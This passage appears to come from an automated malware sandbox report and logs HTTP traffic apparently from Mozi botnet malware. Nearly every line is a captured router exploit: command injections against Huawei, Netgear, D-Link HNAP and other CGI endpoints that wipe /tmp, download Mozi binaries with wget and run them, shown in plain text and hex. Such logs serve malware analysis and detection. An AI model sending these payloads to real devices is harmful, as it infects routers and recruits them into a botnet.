76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 51.34.12.149:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 190.47.184.56:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 161.235.64.87:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 35.153.79.200:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 138.5.67.165:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 105.111.106.150:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 198.207.65.173:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 159.49.233.192:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 